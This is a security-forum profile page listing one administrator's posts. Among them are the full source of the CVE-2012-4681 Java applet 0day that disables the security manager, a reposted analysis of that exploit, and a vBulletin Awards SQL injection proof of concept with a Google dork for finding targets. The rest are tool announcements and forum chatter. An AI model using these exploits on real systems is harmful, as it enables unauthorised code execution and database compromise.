Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    706

 Content Type 

Everything posted by Nytro

  1. Nytro
    Bun, sa vedem ce zic astia, vorbesc diseara cu ei. Thanks
  2. Nytro
    Eu nu am pretentii, mie mi se pare ok, doar cu mici modificari gen fara acel "hacker inside".
  3. Nytro
    CVE-2012-XXXX Java 0day // // CVE-2012-XXXX Java 0day // // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html // // secret host / ip : ok.aa24.net / 59.120.154.62 // // regurgitated by jduck // // probably a metasploit module soon... // package cve2012xxxx; import java.applet.Applet; import java.awt.Graphics; import java.beans.Expression; import java.beans.Statement; import java.lang.reflect.Field; import java.net.URL; import java.security.*; import java.security.cert.Certificate; public class Gondvv extends Applet { public Gondvv() { } public void disableSecurity() throws Throwable { Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]); Permissions localPermissions = new Permissions(); localPermissions.add(new AllPermission()); ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions); AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] { localProtectionDomain }); SetField(Statement.class, "acc", localStatement, localAccessControlContext); localStatement.execute(); } private Class GetClass(String paramString) throws Throwable { Object arrayOfObject[] = new Object[1]; arrayOfObject[0] = paramString; Expression localExpression = new Expression(Class.class, "forName", arrayOfObject); localExpression.execute(); return (Class)localExpression.getValue(); } private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2) throws Throwable { Object arrayOfObject[] = new Object[2]; arrayOfObject[0] = paramClass; arrayOfObject[1] = paramString; Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject); localExpression.execute(); ((Field)localExpression.getValue()).set(paramObject1, paramObject2); } public void init() { try { disableSecurity(); Process localProcess = null; localProcess = Runtime.getRuntime().exec("calc.exe"); if(localProcess != null); localProcess.waitFor(); } catch(Throwable localThrowable) { localThrowable.printStackTrace(); } } public void paint(Graphics paramGraphics) { paramGraphics.drawString("Loading", 50, 25); } } Sursa: #4594319 - Pastie
  4. Nytro
    Java 0day analysis (CVE-2012-4681) Tuesday, August 28, 2012 (This post brought to you by Esteban, Immunity's in-house Java friend) Summary A couple of days ago, a Java 0day was found running like crazy in the wild. While a lot of defense bunnies where asking "WWMAD" (What will my Antivirus do?), we decide to dive into Java for the details of the vulnerability and as we expected, the unpatched vulnerabilities used in the Gondvv exploit were more than one (When we said, "dive deep into Java", we actually meant open our new Infiltrate 2013 Master Class slide deck which will include a full day of Java auditing). The first bug was used to get a reference to sun.awt.SunToolkit class that is restricted to applets while the second bug invokes the getField public static method on SunToolkit using reflection with a trusted immediate caller bypassing a security check. The beauty of this bug class is that it provides 100% reliability and is multiplatform. Hence this will shortly become the penetration test Swiss knife for the next couple of years (as did its older brother CVE-2008-5353). As a final note, the bug was introduced in Java 7.0 released in July 28, 2011. While you are feeling the rush of blood going through your veins while by getting all those shell being pop, think that somewhere not far way (Probably a 10hs flight from some of the major airports in Norte Americana) was enjoying it non-stop for quite some time now. Introduction As the “Secure Coding Guidelines” document [1] states, it is important to understand how the permissions are checked in the Java security model. (Please readguideline 9-1). Many operations in the JDK perform permission checks before executing. Whenever a call to java.security.AccessController.checkPermission method is performed, the complete call stack that exists at that moment is analyzed. If any of the callers in the stack do not have the required privileged an exception is raised. When we are running code in an Applet in our browser, there is a context that has very restricted permissions. This means that if there is any caller in the stack that is part of our applet, the permission checks will fail (unless there is a doPrivileged code block, but let's leave that out for now). Section “9 – Access Control” in the “Secure Coding Guidelines” document [1] together with the “Java Security Architecture” document [2] will give you a complete insight on how all this works. The Gondvv exploit A PoC for this 0 day exploit quickly began to spread when Joshua J. Drake posted it on Twitter https://twitter.com/jduck1337/status/239875285913317376. By analyzing this implementation we can clearly see how the exploitation is done and where the vulnerabilities are really located. The first thing we notice, is that most of the online analysis talks about one vulnerability where we saw two 2 vulnerabilities being exploited to achieve full execution on a target. Basically the exploit is creating an java.security.AccessControlContext instance with a java.security.ProtectionDomain that has full permissions and then replace the actual AccessControlContext of a java.beans.Statement instance to be able to execute code with full privileges. So let's take a better look at each part to understand what is happening under the hood. In the java.beans.Statement implementation we can see that the AccessControlContext instance is a private final field and it gets its value by calling AccessController.getContext(). [TABLE="width: 100%"] [TR] [TD="width: 100%"] [FONT=Monospace][B]public class[/B] Statement {[/FONT] [FONT=Monospace][B]private static[/B] Object[] [I]emptyArray[/I] = [B]new[/B] Object[]{};[/FONT] [FONT=Monospace][B]static[/B] ExceptionListener [I]defaultExceptionListener[/I] = [B]new[/B] ExceptionListener() {[/FONT] [FONT=Monospace][B]public void[/B] exceptionThrown(Exception e) {[/FONT] [FONT=Monospace]System.[I]err[/I].println(e);[/FONT] [FONT=Monospace]System.[I]err[/I].println("Continuing ...");[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]};[/FONT] [FONT=Monospace][B]private final[/B] AccessControlContext acc = AccessController.[I]getContext[/I]();[/FONT] [FONT=Monospace][B]private final[/B] Object target;[/FONT] [FONT=Monospace][B]private final[/B] String methodName;[/FONT] [FONT=Monospace][B]private final[/B] Object[] arguments;[/FONT] [FONT=Monospace]ClassLoader loader;[/FONT] [FONT=Monospace][...][/FONT] [FONT=Monospace]}[/FONT] [/TD] [/TR] [/TABLE] That call to the getContext method will set the AccessControlContext to an applet context that has restrictions with a limited ProtectionDomain which of course is not privileged at all. Back in 2010 Sami Koivu published information about a Java vulnerability (CVE-2010-0840) that built a “trusted method chain” [4]. You can see in the article that the exploitation of that vulnerability also made use of the java.beans.Statement class. The article also explains that the fix was to add an AccessControlContext field to the Statement class setting its value to the applet context when creating an instance thus avoiding the full trusted chain. This AccessControllContext field added in that fix is exactly what this new 0 day exploit is replacing in order to be able to execute code with full permissions. But how can a private field be changed? The trick here is to use the sun.awt.SunToolkit class which contains a very interesting public static method: [TABLE="width: 100%"] [TR] [TD="width: 100%"] [FONT=Monospace][B]public static[/B] Field getField([B]final[/B] Class klass, [B]final[/B] String fieldName) {[/FONT] [FONT=Monospace][B]return[/B] AccessController.[I]doPrivileged[/I]([B]new[/B] PrivilegedAction<Field>() {[/FONT] [FONT=Monospace][B]public[/B] Field run() {[/FONT] [FONT=Monospace][B]try[/B] {[/FONT] [FONT=Monospace]Field field = klass.getDeclaredField(fieldName);[/FONT] [FONT=Monospace][B]assert[/B] (field != [B]null[/B]);[/FONT] [FONT=Monospace]field.setAccessible([B]true[/B]);[/FONT] [FONT=Monospace][B]return[/B] field;[/FONT] [FONT=Monospace]} [B]catch[/B] (SecurityException e) {[/FONT] [FONT=Monospace][B]assert false[/B];[/FONT] [FONT=Monospace]} [B]catch[/B] (NoSuchFieldException e) {[/FONT] [FONT=Monospace][B]assert false[/B];[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]return null[/B];[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]});[/FONT] [FONT=Monospace]}[/FONT] [/TD] [/TR] [/TABLE] We can see that it is using reflection to get fields and the complete implementation is inside a doPrivileged block. This getField method can be used to get any field on a class and the good thing is that it can even retrieve private ones. Well this is of course very useful, it's important to notice that the classes that are part of certain packages are restricted for applets and cannot be accessed or used. Such packages are: com.sun.deploy.* com.sun.imageio.* com.sun.javaws.* com.sun.jnlp.* com.sun.xml.internal.bind.* com.sun.xml.internal.ws.* sun.* Trying to instantiate or use classes in these packages will result in an AccessControlException. This means that we are not able to get a reference to the sun.awt.SunToolkit class from our applet. But the basic thing we need to know is that calls to certain methods can potentially bypass the SecurityManager checks depending on the immediate caller's class loader. This is explained in detail in the “Secure Coding Guidelines” document by Sun [1] in guidelines 9-8 and 9-9. This exploit is abusing this situation taking advantage of the immediate caller to bypass security checks. Vulnerabilities There are 2 different zero-day vulnerabilities used in this exploit: one is used to obtain a reference to the sun.awt.SunToolkit class and the other is used to invoke the public getField method on that class. The exploit is making use of the java.beans.Expression which is a java.beans.Statement subclass. There are 2 Expression instances that are used to trigger these 2 different bugs. When the Expression.execute method is called it ends up calling Statement.invokeInternal method, so let's check the implementation: [TABLE="width: 100%"] [TR] [TD="width: 100%"] [FONT=Monospace][B]private[/B] Object invokeInternal() [B]throws[/B] Exception {[/FONT] [FONT=Monospace]Object target = getTarget();[/FONT] [FONT=Monospace]String methodName = getMethodName();[/FONT] [FONT=Monospace][B]if[/B] (target == [B]null[/B] || methodName == [B]null[/B]) {[/FONT] [FONT=Monospace][B]throw new[/B] NullPointerException((target == [B]null[/B] ? "target" :[/FONT] [FONT=Monospace]"methodName") + " should not be null");[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]Object[] arguments = getArguments();[/FONT] [FONT=Monospace][B]if[/B] (arguments == [B]null[/B]) {[/FONT] [FONT=Monospace]arguments = [I]emptyArray[/I];[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]// Class.forName() won't load classes outside[/FONT] [FONT=Monospace]// of core from a class inside core. Special[/FONT] [FONT=Monospace]// case this method.[/FONT] [FONT=Monospace][B]if[/B] (target == Class.[B]class[/B] && methodName.equals("forName")) {[/FONT] [FONT=Monospace][B]return[/B] ClassFinder.[I]resolveClass[/I]((String)arguments[0], [B]this[/B].loader);[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]Class[] argClasses = [B]new[/B] Class[arguments.length];[/FONT] [FONT=Monospace][B]for[/B]([B]int[/B] i = 0; i < arguments.length; i++) {[/FONT] [FONT=Monospace]argClasses[i] = (arguments[i] == [B]null[/B]) ? [B]null[/B] : arguments[i].getClass();[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]AccessibleObject m = [B]null[/B];[/FONT] [FONT=Monospace][B]if[/B] (target [B]instanceof[/B] Class) {[/FONT] [FONT=Monospace]/*[/FONT] [FONT=Monospace]For class methods, simluate the effect of a meta class[/FONT] [FONT=Monospace]by taking the union of the static methods of the[/FONT] [FONT=Monospace]actual class, with the instance methods of "Class.class"[/FONT] [FONT=Monospace]and the overloaded "newInstance" methods defined by the[/FONT] [FONT=Monospace]constructors.[/FONT] [FONT=Monospace]This way "System.class", for example, will perform both[/FONT] [FONT=Monospace]the static method getProperties() and the instance method[/FONT] [FONT=Monospace]getSuperclass() defined in "Class.class".[/FONT] [FONT=Monospace]*/[/FONT] [FONT=Monospace][B]if[/B] (methodName.equals("new")) {[/FONT] [FONT=Monospace]methodName = "newInstance";[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]// Provide a short form for array instantiation by faking an nary-constructor.[/FONT] [FONT=Monospace][B]if[/B] (methodName.equals("newInstance") && ((Class)target).isArray()) {[/FONT] [FONT=Monospace]Object result = Array.[I]newInstance[/I](((Class)target).getComponentType(), arguments.length);[/FONT] [FONT=Monospace][B]for[/B]([B]int[/B] i = 0; i < arguments.length; i++) {[/FONT] [FONT=Monospace]Array.[I]set[/I](result, i, arguments[i]);[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]return[/B] result;[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]if[/B] (methodName.equals("newInstance") && arguments.length != 0) {[/FONT] [FONT=Monospace]// The Character class, as of 1.4, does not have a constructor[/FONT] [FONT=Monospace]// which takes a String. All of the other "wrapper" classes[/FONT] [FONT=Monospace]// for Java's primitive types have a String constructor so we[/FONT] [FONT=Monospace]// fake such a constructor here so that this special case can be[/FONT] [FONT=Monospace]// ignored elsewhere.[/FONT] [FONT=Monospace][B]if[/B] (target == Character.[B]class[/B] && arguments.length == 1 &&[/FONT] [FONT=Monospace]argClasses[0] == String.[B]class[/B]) {[/FONT] [FONT=Monospace][B]returnnew[/B] Character(((String)arguments[0]).charAt(0));[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]try[/B] {[/FONT] [FONT=Monospace]m = ConstructorFinder.[I]findConstructor[/I]((Class)target, argClasses);[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]catch[/B] (NoSuchMethodException exception) {[/FONT] [FONT=Monospace]m = [B]null[/B];[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]if[/B] (m == [B]null[/B] && target != Class.[B]class[/B]) {[/FONT] [FONT=Monospace]m = [I]getMethod[/I]((Class)target, methodName, argClasses);[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]if[/B] (m == [B]null[/B]) {[/FONT] [FONT=Monospace]m = [I]getMethod[/I](Class.[B]class[/B], methodName, argClasses);[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]else[/B] {[/FONT] [FONT=Monospace]/*[/FONT] [FONT=Monospace]This special casing of arrays is not necessary, but makes files[/FONT] [FONT=Monospace]involving arrays much shorter and simplifies the archiving infrastrcure.[/FONT] [FONT=Monospace]The Array.set() method introduces an unusual idea - that of a static method[/FONT] [FONT=Monospace]changing the state of an instance. Normally statements with side[/FONT] [FONT=Monospace]effects on objects are instance methods of the objects themselves[/FONT] [FONT=Monospace]and we reinstate this rule (perhaps temporarily) by special-casing arrays.[/FONT] [FONT=Monospace]*/[/FONT] [FONT=Monospace][B]if[/B] (target.getClass().isArray() &&[/FONT] [FONT=Monospace](methodName.equals("set") || methodName.equals("get"))) {[/FONT] [FONT=Monospace][B]int[/B] index = ((Integer)arguments[0]).intValue();[/FONT] [FONT=Monospace][B]if[/B] (methodName.equals("get")) {[/FONT] [FONT=Monospace][B]return[/B] Array.[I]get[/I](target, index);[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]else[/B] {[/FONT] [FONT=Monospace]Array.[I]set[/I](target, index, arguments[1]);[/FONT] [FONT=Monospace][B]returnnull[/B];[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]m = [I]getMethod[/I](target.getClass(), methodName, argClasses);[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]if[/B] (m != [B]null[/B]) {[/FONT] [FONT=Monospace][B]try[/B] {[/FONT] [FONT=Monospace][B]if[/B] (m [B]instanceof[/B] Method) {[/FONT] [FONT=Monospace][B]return[/B] MethodUtil.[I]invoke[/I]((Method)m, target, arguments);[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]else[/B] {[/FONT] [FONT=Monospace][B]return[/B] ((Constructor)m).newInstance(arguments);[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]catch[/B] (IllegalAccessException iae) {[/FONT] [FONT=Monospace][B]throw new[/B] Exception("Statement cannot invoke: " +[/FONT] [FONT=Monospace]methodName + " on " + target.getClass(),[/FONT] [FONT=Monospace]iae);[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]catch[/B] (InvocationTargetException ite) {[/FONT] [FONT=Monospace]Throwable te = ite.getTargetException();[/FONT] [FONT=Monospace][B]if[/B] (te [B]instanceof[/B] Exception) {[/FONT] [FONT=Monospace][B]throw[/B] (Exception)te;[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]else[/B] {[/FONT] [FONT=Monospace][B]throw[/B] ite;[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]throw new[/B] NoSuchMethodException(toString());[/FONT] [FONT=Monospace]}[/FONT] [/TD] [/TR] [/TABLE] And the Statement.getMethod implementation is: [TABLE=width: 100%] [TR] [TD=width: 100%] static Method getMethod(Class<?> type, String name, Class<?>... args) { try { return MethodFinder.findMethod(type, name, args); } catch (NoSuchMethodException exception) { return null; } } [/TD] [/TR] [/TABLE] Highlighted in the code you'll see the calls to com.sun.beans.finder.ClassFinder.resolveClass and com.sun.beans.finder.MethodFinder.findMethod methods. com.sun.beans.finder.ClassFinder.findClass vulnerability The Statement.invokeInternal method is calling com.sun.beans.finder.ClassFinder.resolveClass and if we take a look a its implementation we'll see that it ends up calling the com.sun.beans.finder.ClassFinder.findClass method: [TABLE="width: 100%"] [TR] [TD="width: 100%"] [FONT=Monospace][B]public static[/B] Class<?> resolveClass(String name, ClassLoader loader) [B]throws[/B] ClassNotFoundException {[/FONT] [FONT=Monospace]Class<?> type = PrimitiveTypeMap.[I]getType[/I](name);[/FONT] [FONT=Monospace][B]return[/B] (type == [B]null[/B]) ? [I]findClass[/I](name, loader): type;[/FONT] [FONT=Monospace]}[/FONT] [/TD] [/TR] [/TABLE] [TABLE="width: 100%"] [TR] [TD="width: 100%"] [FONT=Monospace][B]public[/B] [B]static[/B] Class<?> findClass(String name) [B]throws[/B] ClassNotFoundException {[/FONT] [FONT=Monospace][B]try[/B] {[/FONT] [FONT=Monospace]ClassLoader loader = Thread.[I]currentThread[/I]().getContextClassLoader();[/FONT] [FONT=Monospace][B]if[/B] (loader == [B]null[/B]) {[/FONT] [FONT=Monospace]loader = ClassLoader.[I]getSystemClassLoader[/I]();[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]if[/B] (loader != [B]null[/B]) {[/FONT] [FONT=Monospace][B]return[/B] Class.[I]forName[/I](name, [B]false[/B], loader);[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]} [B]catch[/B] (ClassNotFoundException exception) {[/FONT] [FONT=Monospace]// use current class loader instead[/FONT] [FONT=Monospace]} [B]catch[/B] (SecurityException exception) {[/FONT] [FONT=Monospace]// use current class loader instead[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace][B]return[/B] Class.[I]forName[/I](name);[/FONT] [FONT=Monospace]}[/FONT] [/TD] [/TR] [/TABLE] This code shows that if an exception is captured, then the default is to simply call Class.forName and this is exaclty what happens here. As it is explained in the Guideline 9-9: “Safely invoke standard APIs that perform tasks using the immediate caller's class loader instance” on the “Secure Code Guidelines” documentation [1], a call to Class.forName will use the immediate caller ClassLoader and in this case the caller is part of the JDK which is trusted thus allowing us to get any class on any package. The caller's stack can be seen by simply debugging the applet: MethodFinder.findMethod vulnerability According to the “Secure Code Guidelines” document in guideline 9.8 the java.lang.Class.getMethod and java.lang.Class.getMethods only take the immediate caller into account when performing security checks. These methods can be used to get a Method reference via reflection but only “public” ones. Even though we have a reference to the sun.awt.SunToolkit class we cannot call any of its methods directly because is part of a restricted package and a security exception will be raised. What is needed here is a way of getting a method reference via reflection but having a “trusted” immediate caller in the stack in order to bypass security checks. The implementation of com.sun.beans.finder.MethodFinder.findMethod is this: [TABLE="width: 100%"] [TR] [TD="width: 100%"] [FONT=Monospace][B]public static[/B] Method findMethod(Class<?> type, String name, Class<?>...args) [B]throws[/B] NoSuchMethodException {[/FONT] [FONT=Monospace][B]if[/B] (name == [B]null[/B]) {[/FONT] [FONT=Monospace][B]throw new[/B] IllegalArgumentException("Method name is not set[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]PrimitiveWrapperMap.[I]replacePrimitivesWithWrappers[/I](args);[/FONT] [FONT=Monospace]Signature signature = [B]new[/B] Signature(type, name, args);[/FONT] [FONT=Monospace]Method method = [I]CACHE[/I].get(signature);[/FONT] [FONT=Monospace][B]if[/B] (method != [B]null[/B]) {[/FONT] [FONT=Monospace][B]return[/B] method;[/FONT] [FONT=Monospace]}[/FONT] [FONT=Monospace]method = [I]findAccessibleMethod[/I]([B]new[/B] MethodFinder(name, args).find(type.getMethods()));[/FONT] [FONT=Monospace][I]CACHE[/I].put(signature, method);[/FONT] [FONT=Monospace][B]return[/B] method;[/FONT] [FONT=Monospace]}[/FONT] [/TD] [/TR] [/TABLE] The call to findAccessibleMethod ends up calling java.lang.Class.getMethods and the immediate caller in the stack is com.sun.beans.finder.MethodFinder which is trusted since is part of the JDK thus bypassing the security checks. Once again we can see the callers stack by debugging the applet: Affected Versions The com.sun.beans.finder.MethodFinder and com.sun.beans.finder.ClassFinder classes are available only since JDK 7. Putting all together So this exploit is performing the following steps: Creates a Statement instance that will call System.setSecurityManager(null) method using reflection. Creates a custom AccessControlContext with full permissions. With one bug it gets a reference to the sun.awt.SunToolkit class that is restricted to applets. With the other bug it invokes the getField public static method on sun.awt.SunToolkit using reflection with a trusted immediate caller that bypasses the security checks. With the getField method it is getting a reference to Statement.acc private field and setting its value to the custom AccessControlContext instance previously created. Finally it executes the Statement that will disable the Security Manager bypassing all security checks because it has full permissions set in its AccessControlContext. Author Esteban Guillardoy esteban@immunityinc.com twitter: @sagar38 References [1] - Secure Coding Guidelines for the Java Programming Language, Version 4.0 - Secure Coding Guidelines for the Java Programming Language, Version 4.0 [2] - Java SE 7 Security Architecture - Java Security Architecture: - [3] - Java SE 7 Security Documents - http://docs.oracle.com/javase/7/docs/technotes/guides/security/ [4] - Sami Koivu Blog - Java Trusted Method Chaining (CVE-2010-0840/ZDI-10-056) - (Slightly) Random Broken Thoughts: Java Trusted Method Chaining (CVE-2010-0840/ZDI-10-056) Posted by Nico Waisman at 11:15 AM Sursa: Immunity Products: Java 0day analysis (CVE-2012-4681)
  5. Nytro
    Alea sunt cele de acum 1 an si jumatate. Trebuie sa si arate bine, dar sa se si potriveasca cu tema.
  6. Nytro
    Salut, De la Pastele de anul trecut tot incercam sa schimbam header-ul forumului. Propuneri de atunci, pentru idei: Ne ajuta cineva cu un nou header?
  7. Nytro
    Da, irelevant faptul ca e vorba de Windows 8...
  8. Nytro
    Ce nu inteleg eu: de ce pula mea se alege cacatul de Ubuntu pentru astfel de comparatii? Nu suport faptul ca s-a ajuns sa se vorbeasca despre Linux ca fiind Ubuntu. Singurul lucru ok la Ubuntu, e ca sunt mii de ratati care fac package-uri. V-ati uitat si voi la update-urile de kernel? Ati vazut cate mailuri de @canonical sunt acolo? Cifra tinde spre 0. Redhat, Novell si multi altii contribuie la kernel, la "chestia" aia care va face voua calculatorul sa mearga bine si repede, si vin muistii de la Canocical, pun un wallpaper colorat pe Desktop si 2-3 efecte vizuale din Compiz (la care au desigur contributie 0) si apar tone de copii copaci si ridica in slavi porcaria lor colorata. De asemenea cei care folosesc Ubuntu, 90%, sunt total paraleli cu ceea ce inseamna Linux, si singura comanda pe care o stiu e "sudo apt-get" desi nu au idee macar despre ce e acel "sudo". Probabil multi habar nu au de sistemul de fisiere, ca e un /proc pe acolo si multe altele. Dar nu tati, esti sunt smecheri ca au "Linux" si aduc argumentele pulii gen "Linux nu are virusi" in discutii impotriva unui sistem de operare pe care l-au folosit toata viata. De ce folosesc ei Linux? Simplu: pentru ca e la fel ca Windows. Da, dai doua click-uri te conectezi la WiFi, ai File Manager (Dolphin), ai browsere, ai Pidgin in loc de Yahoo! Messenger, si cateva alte mici diferente, tot GUI! Deci e pentru multi doar o schimbare de "stil" fara sa aiba cea mai vaga idee despre ce se intampla "sub". Deci, in special cap de tanc astia care ati folosit numai Ubuntu, abtineti-va de la comentarii penibile. Macar de v-ati fi compilat si voi un kernel, sau orice program din surse, sa vedeti care e treaba cu acel program, ce librarii foloseste, ce optiuni are la compilare si cat de customizabil e... Dar nu, voi sunteti "Linuxisti" cica. UBUNTU NU E LINUX! Muie Ubuntu!
  9. Nytro
    vBulletin Yet Another Awards System 4.0.2 SQL Injection Authored by Backsl@sh/Dan Posted Aug 31, 2012 # Exploit Title: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day # Google Dork: inurl:awards.php intext:"powered by vbulletin" # Date: 29/08/12 # Exploit Author: Backsl@sh/Dan # Software Link: http://www.vbulletin.org/forum/showthread.php?t=232684 # Version: 4.0.2+ The vulnerability exists within /request_award.php. $vbulletin->input->clean_array_gpc('p', array( 'award_id' => TYPE_UINT, //'award_request_name' => TYPE_STR, //'award_request_recipient_name' => TYPE_STR, 'award_request_reason' => TYPE_STR, 'award_request_uid' => TYPE_UNIT, )); > $award_request_uid = $vbulletin->GPC['award_request_uid']; > > $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string($vbulletin->GPC['award_request_reason']) ."')"); $award_request_uid is used within an insert into statement, unsanitized. - POC - http://[site].com/request_award.php POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit Thanks. Have fun. http://www.bugabuse.net/ Sursa: vBulletin Yet Another Awards System 4.0.2 SQL Injection ? Packet Storm
  10. Nytro
    E ok pentru cei care vor sa testeze diverse query-uri, de oriunde ar fi. De exemplu, daca sunt la munca, si vreau sa incerc ceva nou, nu stau sa instalez serverul MySQL, intru acolo si testez.
  11. Nytro
    S-a actualizat si pagina cu noi posturi: https://www.facebook.com/rstforum Face cineva un cover photo pentru pagina? Arata urat fara. Ceva simplu si elegant.
  12. Nytro
    Ala pare link-ul de la un mp3...
  13. Nytro
    [h=3]OWASP Security Shepherd 1.2 Released[/h] Security Shepherd is a computer based training application for web application security vulnerabilities. This project strives to hurde the lost sheep of the technological world back to the safe and sound ways of secure practises. Security Shepherd can be deployed as a CTF (Capture the Flag) game or as an open floor educational server. Easy configuration to suit every use Security Shepherd has been designed and implemented with the aim of fostering and improving security awareness among a varied skill-set demographic. This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use. Utilizing the OWASP top ten as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. The bi-product of this challenge game is the acquired skill to harden a players own environment from OWASP top ten security risks The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well. Security Shepherds vulnerabilities are not simulated, and are instead delievered through hardened real security vulnerabilities that can not be abused to compromise the application or it's environment. Many of these levels include insufficient protections to these vulnerabilities, such as black list filteres and poor security configuration. Security Shepherd includes everything you need to complete all of it's levels including the OWASP Zed Attack Proxy Project and portable browsers already configured for proxy use. The Security Shepherd project covers the following web application security topics; SQL Injection Cross Site Scripting Broken Authetication and Session Management Cross Site Rrequest Forgery Insecure Direct Object Reference Insecure Cryptographic Storage Failure to Restrict URL Access Unvalidated Redirects and Forwards Insufficient Transport Layer Security Download OWASP Security Shepherd 1.2 Sursa: OWASP Security Shepherd 1.2 Released - Penetration Testing and Security Tools
  14. Nytro
    [h=3]lafuzz - Local File Incursion exploiter[/h] LaFuzz is a exploiter/fuzzer which is specify on Local File Incursion (LFI), but not just to exploit known vulnerabilities; LaFuzz takes a step forward onto exploiting unknown/0-day which is surrounding directory traversal's vectors. How to use: ./lafuzz.py python2.7 lafuzz.py python lafuzz.py Download lafuzz 1.5 Sursa: lafuzz - Local File Incursion exploiter - Penetration Testing and Security Tools
  15. Nytro
    [h=3]Hideman - Free VPN service with mutliple server locations[/h] Virtual Private Network services are handy when you want to surf internet privately. VPN helps us to protect our surfing habits cached by website. Your internet service provider also not able to know what you are doing on internet. VPN helps you to surf anonymously. Connections to VPNs are encrypted which means that your data is safe from snooping users in the same network. This means you do not have to fear that someone in a hotel, Internet cafe or airport can steal personal information and data from you. Hideman provides its customers with VPN and Wi-Fi protection services. VPN is short for “Virtual Private Network,” which basically allows for an encrypted pathway between servers and hardware. As a result, all computers and web presences using a VPN are completely anonymous, ensuring unsurpassed privacy. Hideman offers this service through their special software which can be downloaded for free. In order to utilize the service, the user runs the software and manually establishes a unique IP address and country of origin. Hideman’s software is completely free to download. On top of that, its users will also be able to use it for four hours a week, providing a nearly “unlimited” free trial. Download For Windows Download for Android Sursa: Hideman - Free VPN service with mutliple server locations - Penetration Testing and Security Tools
  16. Nytro
    [h=3]Safe3 sql injector - Powerful penetration testing tool for SQL Injection[/h] Safe3SI is one of the most powerful and easy usage penetration tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a AI detection engine. Features Full support for http, https website. Full support for Basic, Digest, NTLM http authentications. Full support for GET, Post, Cookie sql injection. Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems. Full support for four SQL injection techniques: blind, error-based, UNION query and force guess. Powerful AI engine to automatic recognite injection type, database type, sql injection best way. Support to enumerate databases, tables, columns and data. Support to read,list and write any file from the database server underlying file system when the database software is MySQL or Microsoft SQL Server. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is Oracle or Microsoft SQL Server. Support to ip domain query,web path guess,md5 crack etc. Support for sql injection scan. Download Safe3 sql injector Sursa: Safe3 sql injector - Powerful penetration testing tool for SQL Injection - Penetration Testing and Security Tools
  17. Nytro
    [h=3]DiskCryptor - Encrypt your partitions[/h] Encrypting your documents protects them from prying eyes if your computer becomes lost or stolen. However, you shouldn’t stop at just encrypting your sensitive documents. A thief can recover passwords and other sensitive information stored by Windows. Even if you password-protect your Windows account, your system files can still be easily accessed, for example, from a Linux-based LiveCD. DiskCryptor - fully open solution to encrypt all partitions, including system. The program is a replacement for proprietary DriveCrypt Plus pack and PGP WDE. The only alternative to DiskCryptor that has comparable features is TrueCrypt. There are other alternatives with similar functionality, but they are fully proprietary ones, which makes them unacceptable to use for protection of confidential data.Originally, DiskCryptor was conceived as a replacement for DriveCrypt Plus Pack and PGP Whole Disk Encryption (WDE). Now, however, the aim of the development of the project is to create the best product in its category. Features of "DiskCryptor" Encryption of system and bootable partitions with pre-boot authentication: · Full support for dynamic disks. · Support for disk devices with large sector size, which is important for hardware RAID operation. · Automatic mounting of disk partitions and external storage devices. · Broad choice in configuration of booting an encrypted OS. Support for various multi-boot options. High performance, comparable to efficiency of a non-encrypted system: · Support for hardware cryptography on VIA processors (PadLock extensions for hardware AES acceleration). · Support for hardware AES acceleration (AES-NI instruction set) on new Intel CPUs. Transparent encryption of disk partitions: · Choice to select an encryption algorithm (AES, Twofish, Serpent), including their combinations. Full support for external storage devices: · Full support for encryption of external USB storage devices. · Option to create 